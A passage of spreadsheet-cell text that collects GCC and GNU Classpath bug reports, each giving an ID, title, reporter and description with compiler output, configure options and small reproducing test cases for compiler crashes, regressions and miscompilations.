Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-200224-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20130619 (experimental) (GCC) 
Tested revisions:
r200224 - crash
4.8 r198018 - OK</t>
  </si>
  <si>
    <t>GCC-51188</t>
  </si>
  <si>
    <t>invalid static_cast from type 'XBase' to type 'int'</t>
  </si>
  <si>
    <t>Created attachment 25844
c++ source
Hi all
i found a strange bug while compiling the attached c++ file
&gt; g++ -c x.cpp
x.cpp: In member function 'std::pair X::getImp() const':
x.cpp:15:57: error: invalid static_cast from type 'XBase' to type 'int'
if I remove any of the superfluous statements in x.cpp it works fine!
mario.
------------------------------------------------------------------------------
&gt; uname -a
Linux ahsoka.intec.dom 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Sep 29 10:24:25 EDT 2011 x86_64 x86_64 x86_64 GNU/Linux
&gt; rpm -qa glibc* | grep -e 'glibc-[0-9]' | sort -u
glibc-2.12-1.25.el6_1.3.i686
glibc-2.12-1.25.el6_1.3.x86_64
&gt; g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/app2/gcc/4.7.0-20111117-svn181436/x86_64/libexec/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix=/app2/gcc/4.7.0-20111117-svn181436/x86_64 --enable-languages=cc++fortran --disable-nls --with-gmp=/app2/gcc/4.7.0-20111117-svn181436/x86_64/aux --with-mpfr=/app2/gcc/4.7.0-20111117-svn181436/x86_64/aux --with-mpc=/app2/gcc/4.7.0-20111117-svn181436/x86_64/aux --with-ppl=/app2/gcc/4.7.0-20111117-svn181436/x86_64/aux --with-cloog=/app2/gcc/4.7.0-20111117-svn181436/x86_64/aux
Thread model: posix
gcc version 4.7.0 20111117 (experimental) (GCC) 
&gt; ld -v
GNU ld (GNU Binutils) 2.22.51.20111117</t>
  </si>
  <si>
    <t>mario-baumann</t>
  </si>
  <si>
    <t>GCC-10066</t>
  </si>
  <si>
    <t>[3.3 regression][arm-linux] libjava build error on arm-linux</t>
  </si>
  <si>
    <t>binutils was 2.13.90.0.18
/bin/sh ./libtool --tag=GCJ --mode=compile /build/buildd/gcc-snapshot-20030301/build/gcc/gcj -B/build/buildd/gcc-snapshot-20030301/build/arm-linux/libjava/ -B/build/buildd/gcc-snapshot-20030301/build/gcc/ --encoding=UTF-8 -fclasspath= -fbootclasspath=/build/buildd/gcc-snapshot-20030301/build/arm-linux/libjava -g -O2 -MD -MT gnu/java/rmi/server/UnicastConnectionManager.lo -MF gnu/java/rmi/server/UnicastConnectionManager.d -c -o gnu/java/rmi/server/UnicastConnectionManager.lo /build/buildd/gcc-snapshot-20030301/src/libjava/gnu/java/rmi/server/UnicastConnectionManager.java
/build/buildd/gcc-snapshot-20030301/build/gcc/gcj -B/build/buildd/gcc-snapshot-20030301/build/arm-linux/libjava/ -B/build/buildd/gcc-snapshot-20030301/build/gcc/ --encoding=UTF-8 -fclasspath= -fbootclasspath=/build/buildd/gcc-snapshot-20030301/build/arm-linux/libjava -g -O2 -MD -MT gnu/java/rmi/server/UnicastConnectionManager.lo -MF gnu/java/rmi/server/UnicastConnectionManager.d -c /build/buildd/gcc-snapshot-20030301/src/libjava/gnu/java/rmi/server/UnicastConnectionManager.java -fPIC -o gnu/java/rmi/server/.libs/UnicastConnectionManager.o
/tmp/ccPuvqJb.s: Assembler messages:
/tmp/ccPuvqJb.s:1800: Error: can't resolve `_GLOBAL_OFFSET_TABLE_' {*UND* section} - `.L118' {*UND* section}
make[5]: *** [gnu/java/rmi/server/UnicastConnectionManager.lo] Error 1
make[5]: Leaving directory `/build/buildd/gcc-snapshot-20030301/build/arm-linux/libjava'
Release:
3.3 20030301 (Debian prerelease) (Debian testing/unstable)
Environment:
Architecture: arm</t>
  </si>
  <si>
    <t>GCC-77587</t>
  </si>
  <si>
    <t>[5 Regression] C compiler produces incorrect stack alignment with __attribute__((weak))</t>
  </si>
  <si>
    <t>Created attachment 39615
Test case for weak attribute stack misalignment
I have run into a case where GCC produces a stack aligned to 8 bytes instead of the required 16 bytes when using __attribute__((weak)).  I originally mistakenly reported this as a problem with sprintf() here: https://sourceware.org/bugzilla/show_bug.cgi?id=20596 
This case produces a call to sprintf() with the stack aligned to 8 bytes but sprintf() calls the MOVAPS instruction which will crash if the stack is not aligned to 16 bytes.
The attached test case consists of two files.  The compile command is in the comments at the top of stacktest.c.  The crash occurs if __attribute__((weak)) is used in the example and does not occur without it.  Change SPRINTF_CRASH from 1 to 0 in stacktest.c to eliminate the crash.
My test system is Ubuntu 16.04 LTS.
uname -a:  Linux mylinux 4.4.0-22-generic #40-Ubuntu SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
gcc -v: gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.2) 
glibc:  2.23</t>
  </si>
  <si>
    <t>andrew.thomas</t>
  </si>
  <si>
    <t>GCC-77450</t>
  </si>
  <si>
    <t>[5 Regression] ICE: in verify_ssa at tree-ssa.c:1016 on very simple code with vectors</t>
  </si>
  <si>
    <t>Created attachment 39538
reduced testcase
Compiler output:
$ x86_64-pc-linux-gnu-gcc testcase.c
testcase.c: In function 'foo':
testcase.c:7:1: internal compiler error: in verify_ssa at tree-ssa.c:1016
 }
 ^
0xde3139 verify_ssa(bool bool)
        /repo/gcc-trunk/gcc/tree-ssa.c:1016
0xac5e25 execute_function_todo
        /repo/gcc-trunk/gcc/passes.c:1971
0xac6c8f do_per_function
        /repo/gcc-trunk/gcc/passes.c:1655
0xac6d06 execute_todo
        /repo/gcc-trunk/gcc/passes.c:2014
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc testcase.c -W
testcase.c: In function 'foo':
testcase.c:7:1: internal compiler error: in execute_todo at passes.c:2009
 }
 ^
0xac6dda execute_todo
        /repo/gcc-trunk/gcc/passes.c:2009
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc -v           
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-239934-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-239934-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 7.0.0 20160901 (experimental) (GCC) 
Tested revisions:
r239934 - ICE
6-branch r239849 - ICE
5-branch r239848 - ICE
4_9-branch r239063 - ICE
4_8-branch r224828 - ICE
4_7-branch r211571 - OK</t>
  </si>
  <si>
    <t>GCC-47123</t>
  </si>
  <si>
    <t>*freebsd configurations configure but don't build</t>
  </si>
  <si>
    <t>Freebsd configurations without a major OS version number e.g. alpha-freebsd
configure but fail to build because FBSD_MAJOR is not defined:
In file included from ./tm.h:20:0
                 from ../../../gcc/gcc/genflags.c:27:
../../../gcc/gcc/config/freebsd-spec.h:109:16: error: operator '&lt;' has no left operand
../../../gcc/gcc/config/freebsd-spec.h:128:16: error: operator '&lt;' has no left operand
make[1]: *** [build/genflags.o] Error 1
make[1]: Leaving directory `/home/amylaar/pr46489/dec25/multi-mk2/alpha-freebsd/gcc'
If this configuration is not supposed to work it would be preferable to
reject it at configure time.</t>
  </si>
  <si>
    <t>GCC-34387</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/optional_dim_2.f90: FE vs library argument missmatch</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/gfortran/../../gf
ortran -B/home/dave/gnu/gcc-4.3/objdir/gcc/testsuite/gfortran/../../ /home/dave/gnu/gcc-4.3/gcc/gcc/testsuite/gfortran.dg/optional_dim_2.f90   -O0   -pedantic-errors  -L/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libiberty  -lm   -o ./optional_dim_2.exe    (timeout = 300)
PASS: gfortran.dg/optional_dim_2.f90  -O0  (test for excess errors)
Setting LD_LIBRARY_PATH to .:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libgfortran/.libs:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libgfortran/.libs:/home/dave/gnu/gcc-4.3/objdir/gcc:.:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libgfortran/.libs:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/./libgfortran/.libs:/home/dave/gnu/gcc-4.3/objdir/gcc:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/libstdc++-v3/.libs:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/libmudflap/.libs:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/libssp/.libs:/home/dave/gnu/gcc-4.3/objdir/hppa-linux/libgomp/.libs:/home/dave/gnu/gcc-4.3/objdir/./gcc:/home/dave/gnu/gcc-4.3/objdir/./prev-gcc
Fortran runtime error: Argument 'DIM' is out of range in call to 'CSHIFT'
FAIL: gfortran.dg/optional_dim_2.f90  -O0  execution test</t>
  </si>
  <si>
    <t>GCC-18984</t>
  </si>
  <si>
    <t>[4.0 regression] ICE in check_pointer_types_r</t>
  </si>
  <si>
    <t>$ cat str.ii 
struct Str 
{ 
    Str(const char *chars) 
    Str 
    virtual operator char*() const 
} 
Str _localName(Str fullname) 
{ 
  return (char*)fullname 
} 
$ gcc str.ii 
str.ii: In function Str _localName(Str): 
str.ii:7: internal compiler error: in check_pointer_types_r at 
gimplify.c:4198</t>
  </si>
  <si>
    <t>GCC-56419</t>
  </si>
  <si>
    <t>[4.8 regression] transactions in for-loops disappear</t>
  </si>
  <si>
    <t>Transaction statements in for-loops don't show up in Gimple.  For example:
int x = 0
int inc_func(int i) {
     for (int j = 0 j &lt; i ++j)
     {
         __transaction_atomic { x+=1 }
     }
     return 0
}
g++ -v -O0 test.cc -c -fgnu-tm -fdump-tree-all -Wall
leads to the following test.cc.004t.gimple:
int inc_func(int) (int i)
{
  int D.2360
  {
    int j
    j = 0
    goto 
    :
    j = j + 1
    :
    if (j  else goto 
    :
  }
  D.2360 = 0
  return D.2360
}
This does work when using the C frontend.  Seems to also work when the transaction is in while loops or on an if-branch.  Doesn't seem to be sensitive to which C++ standard is requested.
Originally reported by Mike Spear.  Mike says this works with 4.7.2 but doesn't with g++ (GCC) 4.8.0 20130221 (experimental) (revision 
196192).  I've confirmed with an early-December build.</t>
  </si>
  <si>
    <t>GCC-83369</t>
  </si>
  <si>
    <t>Missing diagnostics during inlining</t>
  </si>
  <si>
    <t>When code below is compiled gcc prints warnings that null is passed to function with nonnull attribute. However gcc does not point that error is caused by inlining of my_strcpy at line 32 of test.cc.
Code was compiled using gcc (GCC) 8.0.0 20171210 (experimental).
[code]
#include 
char buf[100]
struct Test
{
    const char* s1
    const char* s2
}
__attribute((nonnull(1 2)))
inline char* my_strcpy(char* __restrict__ dst const char* __restrict__ src size_t size)
{
    size_t len = strlen(src)
    if (len &lt; size)
        memcpy(dst src len + 1)
    else
    {
        memcpy(dst src size - 1)
        dst[size - 1] = '\0'
    }
    return dst
}
void test(Test* test)
{
    if (test-&gt;s1)
        my_strcpy(buf test-&gt;s1 sizeof(buf))
    else if (test-&gt;s2)
        my_strcpy(buf test-&gt;s2 sizeof(buf))
    else
        my_strcpy(buf test-&gt;s2 sizeof(buf)) // error line 32
}
[/code]
[out]
$ g++ -c -o test.o test.cc -O2 -Wall
test.cc: In function â€˜void test(Test*)â€™:
test.cc:14:24: warning: argument 1 null where non-null expected [-Wnonnull]
     size_t len = strlen(src)
                  ~~~~~~^~~~~
In file included from test.cc:1:
/usr/include/string.h:395:15: note: in a call to function â€˜size_t strlen(const char*)â€™ declared here
 extern size_t strlen (const char *__s)
               ^~~~~~
test.cc:16:15: warning: argument 2 null where non-null expected [-Wnonnull]
         memcpy(dst src len + 1)
         ~~~~~~^~~~~~~~~~~~~~~~~~~
In file included from test.cc:1:
/usr/include/string.h:42:14: note: in a call to function â€˜void* memcpy(void* const void* size_t)â€™ declared here
 extern void *memcpy (void *__restrict __dest const void *__restrict __src
              ^~~~~~
test.cc:19:15: warning: argument 2 null where non-null expected [-Wnonnull]
         memcpy(dst src size - 1)
         ~~~~~~^~~~~~~~~~~~~~~~~~~~
In file included from test.cc:1:
/usr/include/string.h:42:14: note: in a call to function â€˜void* memcpy(void* const void* size_t)â€™ declared here
 extern void *memcpy (void *__restrict __dest const void *__restrict __src
              ^~~~~~
[/out]</t>
  </si>
  <si>
    <t>GCC-13900</t>
  </si>
  <si>
    <t>time_put chokes on a trailing %</t>
  </si>
  <si>
    <t>The expected output of the program below is Sun Jan  0 00:00:00 1900 %.
Instead when compiled with gcc 3.3.2 the program dumps core. When it
encounters the trailing '%' in the format string the time_put::do_put() member
function fails to check to see if it happens to be the last character and ends
up incrementing right past it (line 1986 of locale_facets.tcc).
Regards
Martin
#include 
#include 
#include 
int main ()
{
    const std::time_put &amp;tp =
        std::use_facet &gt;(std::locale::classic ())
    std::tm tmb = { }
    const char fmt[] = %c %
    tp.put (std::ostreambuf_iterator(std::cout.rdbuf ())
            std::cout ' ' 
    std::cout &lt;&lt; '\n'
}</t>
  </si>
  <si>
    <t>GCC-39182</t>
  </si>
  <si>
    <t>ICE in gen_add2_insn at optabs.c:4884</t>
  </si>
  <si>
    <t>We get this error multiple places in the RTEMS code base.  
m32c-rtems4.10-gcc --pipe  -mcpu=m32cm --pipe -DHAVE_CONFIG_H   -I.. -I../../../lib/include -D__RTEMS_INSIDE__  -Wall -Wimplicit-function-declaration -Wstrict-prototypes -Wnested-externs -fasm -g -O2  -mcpu=m32cm -MT src/libsapi_a-ioregisterdriver.o -MD -MP -MF src/.deps/libsapi_a-ioregisterdriver.Tpo -c -o src/libsapi_a-ioregisterdriver.o `test -f 'src/ioregisterdriver.c' || echo '../../../../../rtems/cpukit/sapi/'`src/ioregisterdriver.c
../../../../../rtems/cpukit/sapi/src/ioregisterdriver.c: In function 'rtems_io_register_driver':
../../../../../rtems/cpukit/sapi/src/ioregisterdriver.c:92: internal compiler error: in gen_add2_insn at optabs.c:4884</t>
  </si>
  <si>
    <t>GCC-4629</t>
  </si>
  <si>
    <t>non-constant `sizeof (void*)' cannot be used as template argument</t>
  </si>
  <si>
    <t>gcc 3.1 rejects the following code tp.C extracted from
libs/pool/test/test_pool_alloc.cpp from the current boost
repository. gcc 3.01 and gcc 2.95.2 accept this code.
Release:
3.1 20011013 (experimental)
Environment:
System: Linux kiste 2.4.12 #2 Sat Oct 20 15:07:23 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
glibc 2.2
GNU ld version 2.11.90.0.23
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --enable-threads=posix --enable-languages=cc++f77objc --disable-nls --enable-clocale=gnu
How-To-Repeat:
Source code tp.C
template  struct A {}
template 
struct B
{
    char * f() const
    {
      return (A::value)
    }
}
Compiling tp.C by gcc 3.1
g++ -v -c -W -Wall tp.C 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --enable-threads=posix --enable-languages=cc++f77objc --disable-nls --enable-clocale=gnu
Thread model: posix
gcc version 3.1 20011013 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -W -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tp.C -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase tp.C -W -Wall -version -o /tmp/ccEyvLMb.s
GNU CPP version 3.1 20011013 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20011013 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20011013 (experimental).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
tp.C: In member function `char* B::f() const':
tp.C:8: non-constant `sizeof (void*)' cannot be used as template argument
Compiling tp.C by gcc 2.95.2
/usr/bin/g++ -v -c -W -Wall tp.C 
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -W -Wall -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di486 -D__i486 -D__i486__ tp.C /tmp/ccwTynxn.ii
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++
 /usr/local/include
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/../../../../i486-suse-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i486-suse-linux/2.95.2/cc1plus /tmp/ccwTynxn.ii -quiet -dumpbase tp.cc -W -Wall -version -o /tmp/ccWkj1hG.s
GNU C++ version 2.95.2 19991024 (release) (i486-suse-linux) compiled by GNU C version 2.95.2 19991024 (release).
 /usr/i486-suse-linux/bin/as -V -Qy -o tp.o /tmp/ccWkj1hG.s
GNU assembler version 2.10.91 (i486-suse-linux) using BFD version 2.10.0.33</t>
  </si>
  <si>
    <t>GCC-41494</t>
  </si>
  <si>
    <t>[4.5 Regression] temp and memcpy used when zeroing array</t>
  </si>
  <si>
    <t>The following is causing a 7% degradation on cpu2000 benchmark 191.fma3d. The problem was introduced somewhere between revisions 151544 and 151586.
Compile the following with -m32 -O2.
      MODULE force_                                                     
      TYPE :: force_type                                                
        REAL(KIND(0D0))  Xext    ! X direction external force              
        REAL(KIND(0D0))  Yext    ! Y direction external force              
        REAL(KIND(0D0))  Zext    ! Z direction external force              
        REAL(KIND(0D0))  Xint    ! X direction internal force              
        REAL(KIND(0D0))  Yint    ! Y direction internal force              
        REAL(KIND(0D0))  Zint    ! Z direction internal force              
      END TYPE                                                          
      TYPE (force_type) DIMENSION(:) ALLOCATABLE :: FORCE             
      INTEGER  NUMRT
      END MODULE force_
      SUBROUTINE SOLVE
        USE force_
      DO i = 1NUMRT
        FORCE(i) = force_type (000000)
      ENDDO
      END
The latter revision now zeroes out a temp and uses that as the source on a memcpy call.
rev 151544:
.L3:
        stfd 00(9)
        stfd 08(9)
        stfd 016(9)
        stfd 024(9)
        stfd 032(9)
        stfd 040(9)
        addi 9948
        bdnz .L3
rev 151586:
.L3:
        mr 330
        mr 428
        stfd 318(1)
        stfd 3116(1)
        li 548
        addi 31311
        stfd 3124(1)
        stfd 3132(1)
        stfd 3140(1)
        stfd 3148(1)
        bl memcpy
        cmpw 73129
        addi 303048
        bne 7.L3</t>
  </si>
  <si>
    <t>GCC-35460</t>
  </si>
  <si>
    <t>[4.4 Regression] undefined reference to `__builtin_stdarg_start' when compiling 2/29 snapshot on OpenBSD</t>
  </si>
  <si>
    <t>When I attempt to compile the snapshot of 2/29/08 on OpenBSD 4.2 I get the following message:
libcpp.a(errors.o)(.text+0x258): In function `cpp_error':
/home/mrichmon/gcc-4.4-20080229/libcpp/errors.c:141: undefined reference to `__builtin_stdarg_start'
libcpp.a(errors.o)(.text+0x3a0): In function `cpp_error_with_line':
/home/mrichmon/gcc-4.4-20080229/libcpp/errors.c:174: undefined reference to `__builtin_stdarg_start'</t>
  </si>
  <si>
    <t>CLASSPATH-33206</t>
  </si>
  <si>
    <t>Long overflow in BigInteger.java</t>
  </si>
  <si>
    <t>Bug.java:
---
import java.math.BigInteger
class Bug {
  public static void main(String[] args) {
    BigInteger test = new BigInteger(340282366920938463463374607431768211457)
    System.out.println(test.isProbablePrime(80))
  }
}
---
Problem:
BigInteger.java:1316:
  BigInteger m = pMinus1.divide(valueOf(2L &lt;&lt; b - 1))
But b = 128 so 2 &lt;&lt; 127 does not fit in a long.
Solution:
  BigInteger m = pMinus1.divide(new BigInteger(2).pow(b - 1))</t>
  </si>
  <si>
    <t>johnx</t>
  </si>
  <si>
    <t>GCC-56434</t>
  </si>
  <si>
    <t>document that __attribute__((__malloc__)) assumes returned pointer has BIGGEST_ALIGNMENT</t>
  </si>
  <si>
    <t>The docs say that __attribute__((__malloc__)) only has one effect: informing the compiler that returned pointers do not alias other pointers.  But reading the compiler output and then reading gcc source code proves that it also has a second effect: informing the compiler that returned pointers are aligned to BIGGEST_ALIGNMENT.  To quote expand_call:
          /* The return value from a malloc-like function is a pointer.  */
          if (TREE_CODE (rettype) == POINTER_TYPE)
            mark_reg_pointer (temp BIGGEST_ALIGNMENT)
This should be added to the documentation.
As a side issue BIGGEST_ALIGNMENT changes on the i386 target depending on whether -mavx is specified (128 vs. 256).  Is it really a good idea for gcc to assume different things about the behavior of malloc() depending on -mavx?  It seems that perhaps an alignment of 128 should always be conferred on malloc on the i386 platform regardless of -mavx?
What would the new target macro be?  SMALLEST_BIGGEST_ALIGNMENT?  :)</t>
  </si>
  <si>
    <t>chip</t>
  </si>
  <si>
    <t>GCC-100</t>
  </si>
  <si>
    <t>confusing name lookup diagnostic</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Wed 08 Mar 2000 20:54:21 CST
 hi -
 gcc (cvs version 2.96 20000306 on i686-pc-linux-gnu) gives a particularly
 confusing diagnostic for the following input (which i believe to be invalid).
 -- egcsbug9.cc -------------------------------------------------------------
 class CftCluster {}
 namespace d0track {
   typedef CftCluster CftCluster
 }
 using namespace d0track
 void foo () {
   CftCluster cftclus
 }
 ----------------------------------------------------------------------------
 I think that this input is invalid because the reference to `CftCluster'
 is ambiguous -- it can be found in both the global and d0track namespaces.
 However the diagnostic i actually get is:
 $ ./cc1plus -quiet egcsbug9.cc
 egcsbug9.cc: In function `void foo ()':
 egcsbug9.cc:10: `CftCluster' undeclared (first use this function)
 egcsbug9.cc:10: (Each undeclared identifier is reported only once
 egcsbug9.cc:10: for each function it appears in.)
 egcsbug9.cc:10: parse error before `'
 Since the problem is too many declarations rather than none
 this is rather confusing.
 thanks
 sss
 [MvL - I think the code is well-formed both definitions refer to the
  same entity]
Release:
(cvs g++ 20000306)</t>
  </si>
  <si>
    <t>GCC-9011</t>
  </si>
  <si>
    <t>printf function does not correctly process long long parameters</t>
  </si>
  <si>
    <t>The printf function does not correctly handle long long input parameters in the MinGW environment (and possible other environments).  The printf function appears to attempt to handle the long long input.  However it only pulls off one 32-bit parameter and does not process the second 32-bit parameter for the long long.  The next format descriptor will typically use the upper 32-bits of the previous long long parameter.
Release:
gcc (GCC) 3.2 (mingw special 20020817-1)
Environment:
MinGW 2.0.0-3 running under Windows NT
How-To-Repeat:
long long A = 12345678901234LL B = 98765432109876LL
printf(%lld %lld\n A B)</t>
  </si>
  <si>
    <t>matt.ball</t>
  </si>
  <si>
    <t>GCC-2755</t>
  </si>
  <si>
    <t>snapshot releases ICE on legal mozilla C code gcc 2.95.3 does not</t>
  </si>
  <si>
    <t>When compiling Mozilla from CVS one of the files needed to be compiled
is jsarray.c (part of Mozilla's javascript implementation I believe). When
compiling it the compiler crashes as follows:
cc1: warning: Ignoring command line option '-fno-rtti'
cc1: warning: (It is valid for C++ but not the selected language)
/home/ajay/moz/cvs/mozilla/js/src/jsarray.c: In function `sort_compare':
/home/ajay/moz/cvs/mozilla/js/src/jsarray.c:744: Internal error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
This same code with even more aggressive optimizations (-funroll-loops -O3 -fexpensive-optimizations) doesnt crash with gcc 2.95.3. 
The following is the output of gcc -v :
Reading specs from /home/ajay/gcc/cvs/cvsrls/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: /home/ajay/gcc/cvs/gcc/configure --prefix=/home/ajay/gcc/cvs/cvsrls --with-gnu-as --with-gnu-ld --enable-languages=c++ --disable-libgcj --with-dwarf2
Thread model: single
gcc version 3.1 20010506 (experimental)
Release:
gcc version 3.1 20010506 (experimental)
Environment:
Mandrake Linux 8.0 Linux x86 kernel 2.4.3 glibc v 2.2.2 gcc 3.1 compiled
with gcc 2.95.3 on a Pentium 3 933Mhz with 256Meg RAM 30G disk
I added /home/ajay/gcc/cvs/cvsrls/lib to LD_LIBRARY_PATH (the root of
my cvs gcc install is /home/ajay/gcc/cvs/cvsrls)
How-To-Repeat:
Compile mozilla/js/src/jsarray.c from the mozilla distribution alternatively
I've attached the .i file as per your web page instructions</t>
  </si>
  <si>
    <t>motrei</t>
  </si>
  <si>
    <t>GCC-64589</t>
  </si>
  <si>
    <t>[OOP] Linking error due to undefined integer symbol with unlimited polymorphism</t>
  </si>
  <si>
    <t>Using unlimited polymorphism appears to generate a linking error due to an unrecognized integer symbol: 
$cat more-fun-with-unlimited-poly.f90 
module ASTG_FormatParser_mod
contains
  subroutine fmt()
    class(*) pointer :: arg
    select type (arg)
    type is (integer)
    end select
  end subroutine 
end module 
module ASTG_MpiFileHandler_mod
contains
  subroutine makeString(arg1)
    class(*) :: arg1
  end subroutine 
  subroutine getSuffix()
    use ASTG_FormatParser_mod
    call makeString(1)
  end subroutine
end module 
end
$gfortran more-fun-with-unlimited-poly.f90 
/tmp/cccnDYiT.o: In function `__astg_mpifilehandler_mod_MOD_getsuffix':
more-fun-with-unlimited-poly.f90:(.text+0x44): undefined reference to `__vtab_INTEGER_4_.3435'
collect2: error: ld returned 1 exit status
$gfortran --version | head -1
GNU Fortran (GCC) 5.0.0 20141222 (experimental)</t>
  </si>
  <si>
    <t>GCC-48731</t>
  </si>
  <si>
    <t>regression: __attribute__((flatten)) produces error with function calling variadic functions</t>
  </si>
  <si>
    <t>Created attachment 24075
preprocessed example source
Function with the flatten attribute that call variadic function do not compile anymore with gcc-4.6. It worked perfectly with gcc-4.5. The attachment provide a simple example of code.
Compilation flag:
% gcc-4.6 -std=gnu99 --save-temp -O3 -c flatten_variadic.c
Resulting error:
flatten_variadic.c: In function â€˜blah2â€™:
flatten_variadic.c:5:23: error: â€˜va_startâ€™ used in function with fixed args
GCC: gcc-4.6 (Debian 4.6.0-4) 4.6.1 20110419 (prerelease)
System: Debian: Linux edelzwicker 2.6.38-2-amd64 #1 SMP Thu Apr 7 04:28:07 UTC 2011 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>florent.bruneau_gcc</t>
  </si>
  <si>
    <t>GCC-44365</t>
  </si>
  <si>
    <t>ICE with -fdump-tree-all</t>
  </si>
  <si>
    <t>GCC produces the ICE for the following code with -fdump-tree-all. This happens in both 4.4.x as well as 4.5.0. It is caused by infinitely recursive call to dump_generic_node (tree-pretty-print.c)
gcc t.c -fdump-tree-all
int main(int argc char *argv[]){
	int n
	if(argc==2)
		n=atoi(argv[1])
	else{
		exit(1)
	}
#define offset(xy) ((char *)&amp;(x-&gt;y))-((char *)x)
	struct {
		int a[n]
		char b[n]
		char c
	}*bar
	printf(%d %d %d %d \noffset(bara[0])offset(barb[0])offset(barc)sizeof(*bar))
	return 0
}</t>
  </si>
  <si>
    <t>GCC-23734</t>
  </si>
  <si>
    <t>[4.1 Regression] make[4]: execvp: /usr/local/bin/bash: Arg list too long</t>
  </si>
  <si>
    <t>make[2]: Leaving directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libiber
ty'
make[2]: Entering directory `/xxx/gnu/gcc-3.3/objdir/hppa1.1-hp-hpux10.20/libstd
c++-v3'
make AR_FLAGS=rc CC_FOR_BUILD=gcc CC_FOR_TARGET=/xxx/gnu/gcc-3.3/objdir/./g
cc/xgcc -B/xxx/gnu/gcc-3.3/objdir/./gcc/ -B/opt/gnu/gcc/gcc-4.1.0/hppa1.1-hp-hpu
x10.20/bin/ -B/opt/gnu/gcc/gcc-4.1.0/hppa1.1-hp-hpux10.20/lib/ -isystem /opt/gnu
/gcc/gcc-4.1.0/hppa1.1-hp-hpux10.20/include -isystem /opt/gnu/gcc/gcc-4.1.0/hppa
